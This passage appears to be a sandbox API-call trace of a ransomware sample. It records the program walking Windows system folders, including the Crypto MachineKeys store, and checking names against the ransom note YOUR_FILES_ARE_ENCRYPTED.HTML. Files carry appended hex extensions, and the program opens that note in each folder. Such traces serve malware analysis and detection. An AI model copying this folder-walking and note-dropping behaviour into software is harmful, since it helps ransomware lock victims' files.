ftLastAccessTime.dwLowDateTime=0x8297548b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae57053e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1301e, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.wordmui.msi.16.en-us.xml.91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16", cAlternateFileName="C2RMAN~1.91B")) returned 1 [0109.846] StrStrIW (lpFirst="C2RManifest.wordmui.msi.16.en-us.xml.91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.846] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16") returned 184 [0109.846] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml.91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16") returned=".91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16" [0109.846] lstrlenW (lpString=".91B947D80728256A3E2232CDB309E0088FA5A46DB724DBCEEF51EAC0D42F6C16") returned 65 [0109.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x828cdbb9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64e40818, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0109.846] StrStrIW (lpFirst="integrator.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.846] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 97 [0109.846] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0109.846] lstrlenW (lpString=".exe") returned 4 [0109.846] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0109.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb55735, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x4eb55735, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xae4fe609, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205", cAlternateFileName="MICROS~1.0FF")) returned 1 [0109.846] StrStrIW (lpFirst="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.846] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205") returned 201 [0109.846] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205") returned=".0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205" [0109.846] lstrlenW (lpString=".0FFEB1C1B8D79E252D2AFB77165CE2747E060017E160D17D37A0D16E33B83205") returned 65 [0109.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e727d9e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x4e727d9e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xae4eee91, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xcb2, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74", cAlternateFileName="MICROS~1.FE2")) returned 1 [0109.846] StrStrIW (lpFirst="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.846] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74") returned 198 [0109.846] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74") returned=".FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74" [0109.846] lstrlenW (lpString=".FE211BEBBDCFBCB19ED6FC1A41AD899E6C78D6E16775CAC1D17FA61B0C4A9E74") returned 65 [0109.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5088032e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x5088032e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9a627e13, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0109.846] StrStrIW (lpFirst="msoutilstat.etw.man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.846] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 102 [0109.846] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0109.846] lstrlenW (lpString=".man") returned 4 [0109.846] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0109.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502726de, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x502726de, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9ee0f0de, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0109.847] StrStrIW (lpFirst="wordEtw.man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.847] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 94 [0109.847] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0109.847] lstrlenW (lpString=".man") returned 4 [0109.847] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0109.847] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43514c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae43514c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae439f48, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.847] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43514c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae43514c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae439f48, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.847] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.847] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0109.847] GetProcessHeap () returned 0x600000 [0109.847] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.847] GetProcessHeap () returned 0x600000 [0109.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.847] GetProcessHeap () returned 0x600000 [0109.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.848] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xae565470, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae565470, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0109.848] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.848] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0109.848] GetProcessHeap () returned 0x600000 [0109.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.849] GetProcessHeap () returned 0x600000 [0109.849] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.849] GetProcessHeap () returned 0x600000 [0109.849] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.850] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Crypto", cAlternateFileName="")) returned 1 [0109.850] StrStrIW (lpFirst="Crypto", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.850] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned 39 [0109.850] GetProcessHeap () returned 0x600000 [0109.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.851] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" [0109.851] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*" [0109.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae5507e2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0109.851] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae5507e2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.851] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="DSS", cAlternateFileName="")) returned 1 [0109.851] StrStrIW (lpFirst="DSS", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.851] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 43 [0109.851] GetProcessHeap () returned 0x600000 [0109.851] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.852] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" [0109.852] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*" [0109.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae495c5c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.852] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae495c5c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.852] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0109.852] StrStrIW (lpFirst="MachineKeys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.852] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 55 [0109.852] GetProcessHeap () returned 0x600000 [0109.852] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.853] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0109.853] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*" [0109.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae47021f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.853] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae47021f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="..", cAlternateFileName="")) returned 1 [0109.853] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae47021f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae47021f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae476993, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.854] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae47021f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae47021f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae476993, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.854] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.854] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0109.854] GetProcessHeap () returned 0x600000 [0109.854] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.854] GetProcessHeap () returned 0x600000 [0109.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.854] GetProcessHeap () returned 0x600000 [0109.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.855] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae495c5c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae495c5c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae49bda5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.855] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae495c5c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae495c5c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae49bda5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.855] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.855] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0109.855] GetProcessHeap () returned 0x600000 [0109.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.856] GetProcessHeap () returned 0x600000 [0109.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.856] GetProcessHeap () returned 0x600000 [0109.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.856] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Keys", cAlternateFileName="")) returned 1 [0109.856] StrStrIW (lpFirst="Keys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.856] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 44 [0109.856] GetProcessHeap () returned 0x600000 [0109.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.857] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" | out: 